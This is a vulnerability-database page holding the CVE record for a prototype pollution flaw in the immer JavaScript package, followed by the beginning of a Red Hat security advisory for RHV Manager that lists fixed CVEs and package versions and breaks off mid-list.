Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2020-28477 (GCVE-0-2020-28477)
Vulnerability from cvelistv5
- Prototype Pollution
| URL | Tags | ||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T16:40:58.850Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://snyk.io/vuln/SNYK-JS-IMMER-1019369"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1061986"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/immerjs/immer/blob/master/src/plugins/patches.ts%23L213"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "immer",
"vendor": "n/a",
"versions": [
{
"lessThan": "unspecified",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Alessio Della Libera (d3lla)"
}
],
"datePublic": "2021-01-19T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "This affects all versions of package immer."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitCodeMaturity": "PROOF_OF_CONCEPT",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"remediationLevel": "UNAVAILABLE",
"reportConfidence": "CONFIRMED",
"scope": "UNCHANGED",
"temporalScore": 7.1,
"temporalSeverity": "HIGH",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:U/RC:C",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Prototype Pollution",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-01-19T10:20:12",
"orgId": "bae035ff-b466-4ff4-94d0-fc9efd9e1730",
"shortName": "snyk"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://snyk.io/vuln/SNYK-JS-IMMER-1019369"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1061986"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/immerjs/immer/blob/master/src/plugins/patches.ts%23L213"
}
],
"title": "Prototype Pollution",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "report@snyk.io",
"DATE_PUBLIC": "2021-01-19T10:16:28.654636Z",
"ID": "CVE-2020-28477",
"STATE": "PUBLIC",
"TITLE": "Prototype Pollution"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "immer",
"version": {
"version_data": [
{
"version_affected": "\u003e=",
"version_value": "0"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Alessio Della Libera (d3lla)"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "This affects all versions of package immer."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:U/RC:C",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Prototype Pollution"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://snyk.io/vuln/SNYK-JS-IMMER-1019369",
"refsource": "MISC",
"url": "https://snyk.io/vuln/SNYK-JS-IMMER-1019369"
},
{
"name": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1061986",
"refsource": "MISC",
"url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1061986"
},
{
"name": "https://github.com/immerjs/immer/blob/master/src/plugins/patches.ts%23L213",
"refsource": "MISC",
"url": "https://github.com/immerjs/immer/blob/master/src/plugins/patches.ts%23L213"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "bae035ff-b466-4ff4-94d0-fc9efd9e1730",
"assignerShortName": "snyk",
"cveId": "CVE-2020-28477",
"datePublished": "2021-01-19T10:20:13.022549Z",
"dateReserved": "2020-11-12T00:00:00",
"dateUpdated": "2024-09-17T04:25:21.993Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2020-28477\",\"sourceIdentifier\":\"report@snyk.io\",\"published\":\"2021-01-19T11:15:13.167\",\"lastModified\":\"2024-11-21T05:22:52.393\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"This affects all versions of package immer.\"},{\"lang\":\"es\",\"value\":\"Esto afecta a todas las versiones del paquete immer\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"report@snyk.io\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:N/I:N/A:P\",\"baseScore\":5.0,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":10.0,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"NVD-CWE-noinfo\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:immer_project:immer:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"8.0.1\",\"matchCriteriaId\":\"34A4B894-BEB8-47C4-AD4E-9D5C8DD8BD27\"}]}]}],\"references\":[{\"url\":\"https://github.com/immerjs/immer/blob/master/src/plugins/patches.ts%23L213\",\"source\":\"report@snyk.io\",\"tags\":[\"Broken Link\"]},{\"url\":\"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1061986\",\"source\":\"report@snyk.io\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://snyk.io/vuln/SNYK-JS-IMMER-1019369\",\"source\":\"report@snyk.io\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/immerjs/immer/blob/master/src/plugins/patches.ts%23L213\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\"]},{\"url\":\"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1061986\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://snyk.io/vuln/SNYK-JS-IMMER-1019369\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]}}"
}
}
rhsa-2021_1169
Vulnerability from csaf_redhat
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Virtualization Engine 4.4.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The ovirt-engine package provides the manager for virtualization environments.\nThis manager enables admins to define hosts and networks, as well as to add\nstorage, create VMs and manage user permissions.\n\nA list of bugs fixed in this update is available in the Technical Notes\nbook:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/html-single/technical_notes\n\nSecurity Fix(es):\n\n* nodejs-bootstrap-select: not escaping title values on \u003coption\u003e may lead to XSS (CVE-2019-20921)\n\n* m2crypto: bleichenbacher timing attacks in the RSA decryption API (CVE-2020-25657)\n\n* datatables.net: prototype pollution if \u0027constructor\u0027 were used in a data property name (CVE-2020-28458)\n\n* nodejs-immer: prototype pollution may lead to DoS or remote code execution (CVE-2020-28477)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:1169",
"url": "https://access.redhat.com/errata/RHSA-2021:1169"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/html-single/technical_notes",
"url": "https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/html-single/technical_notes"
},
{
"category": "external",
"summary": "1145658",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1145658"
},
{
"category": "external",
"summary": "1155275",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1155275"
},
{
"category": "external",
"summary": "1649479",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1649479"
},
{
"category": "external",
"summary": "1666786",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1666786"
},
{
"category": "external",
"summary": "1688186",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1688186"
},
{
"category": "external",
"summary": "1729359",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1729359"
},
{
"category": "external",
"summary": "1787235",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1787235"
},
{
"category": "external",
"summary": "1802844",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1802844"
},
{
"category": "external",
"summary": "1837221",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1837221"
},
{
"category": "external",
"summary": "1843882",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1843882"
},
{
"category": "external",
"summary": "1858420",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1858420"
},
{
"category": "external",
"summary": "1882273",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1882273"
},
{
"category": "external",
"summary": "1884233",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1884233"
},
{
"category": "external",
"summary": "1889823",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1889823"
},
{
"category": "external",
"summary": "1895217",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1895217"
},
{
"category": "external",
"summary": "1901503",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1901503"
},
{
"category": "external",
"summary": "1901752",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1901752"
},
{
"category": "external",
"summary": "1905108",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1905108"
},
{
"category": "external",
"summary": "1905158",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1905158"
},
{
"category": "external",
"summary": "1908441",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1908441"
},
{
"category": "external",
"summary": "1910302",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1910302"
},
{
"category": "external",
"summary": "1913198",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1913198"
},
{
"category": "external",
"summary": "1914602",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1914602"
},
{
"category": "external",
"summary": "1918162",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1918162"
},
{
"category": "external",
"summary": "1919555",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1919555"
},
{
"category": "external",
"summary": "1921104",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1921104"
},
{
"category": "external",
"summary": "1921119",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1921119"
},
{
"category": "external",
"summary": "1922200",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1922200"
},
{
"category": "external",
"summary": "1924012",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1924012"
},
{
"category": "external",
"summary": "1926854",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1926854"
},
{
"category": "external",
"summary": "1927851",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1927851"
},
{
"category": "external",
"summary": "1931514",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1931514"
},
{
"category": "external",
"summary": "1931786",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1931786"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_1169.json"
}
],
"title": "Red Hat Security Advisory: RHV Manager (ovirt-engine) 4.4.z [ovirt-4.4.5] security, bug fix, enhancement",
"tracking": {
"current_release_date": "2024-11-26T06:32:59+00:00",
"generator": {
"date": "2024-11-26T06:32:59+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.1"
}
},
"id": "RHSA-2021:1169",
"initial_release_date": "2021-04-14T16:34:39+00:00",
"revision_history": [
{
"date": "2021-04-14T16:34:39+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-04-14T16:34:39+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-26T06:32:59+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product": {
"name": "RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhev_manager:4.4:el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Virtualization"
},
{
"branches": [
{
"category": "product_version",
"name": "apache-sshd-0:2.6.0-1.el8ev.src",
"product": {
"name": "apache-sshd-0:2.6.0-1.el8ev.src",
"product_id": "apache-sshd-0:2.6.0-1.el8ev.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/apache-sshd@2.6.0-1.el8ev?arch=src"
}
}
},
{
"category": "product_version",
"name": "ansible-runner-service-0:1.0.7-1.el8ev.src",
"product": {
"name": "ansible-runner-service-0:1.0.7-1.el8ev.src",
"product_id": "ansible-runner-service-0:1.0.7-1.el8ev.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-runner-service@1.0.7-1.el8ev?arch=src"
}
}
},
{
"category": "product_version",
"name": "ansible-runner-0:1.4.6-2.el8ar.src",
"product": {
"name": "ansible-runner-0:1.4.6-2.el8ar.src",
"product_id": "ansible-runner-0:1.4.6-2.el8ar.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-runner@1.4.6-2.el8ar?arch=src"
}
}
},
{
"category": "product_version",
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.src",
"product": {
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.src",
"product_id": "ovirt-web-ui-0:1.6.7-1.el8ev.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-web-ui@1.6.7-1.el8ev?arch=src"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"product": {
"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"product_id": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-dwh@4.4.5.5-1.el8ev?arch=src"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"product": {
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"product_id": "ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine@4.4.5.9-0.1.el8ev?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "apache-sshd-0:2.6.0-1.el8ev.noarch",
"product": {
"name": "apache-sshd-0:2.6.0-1.el8ev.noarch",
"product_id": "apache-sshd-0:2.6.0-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/apache-sshd@2.6.0-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"product": {
"name": "apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"product_id": "apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/apache-sshd-javadoc@2.6.0-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"product": {
"name": "ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"product_id": "ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-runner-service@1.0.7-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-runner-0:1.4.6-2.el8ar.noarch",
"product": {
"name": "ansible-runner-0:1.4.6-2.el8ar.noarch",
"product_id": "ansible-runner-0:1.4.6-2.el8ar.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-runner@1.4.6-2.el8ar?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"product": {
"name": "python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"product_id": "python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ansible-runner@1.4.6-2.el8ar?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"product": {
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"product_id": "ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-web-ui@1.6.7-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"product": {
"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"product_id": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-dwh@4.4.5.5-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"product": {
"name": "ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"product_id": "ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-dwh-grafana-integration-setup@4.4.5.5-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"product": {
"name": "ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"product_id": "ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-dwh-setup@4.4.5.5-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-backend@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-dbscripts@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-health-check-bundler@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-restapi@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-base@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-cinderlib@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-imageio@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-ovirt-engine@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-ovirt-engine-common@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-vmconsole-proxy-helper@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-websocket-proxy@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-tools@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-tools-backup@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-vmconsole-proxy-helper@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-webadmin-portal@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-websocket-proxy@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
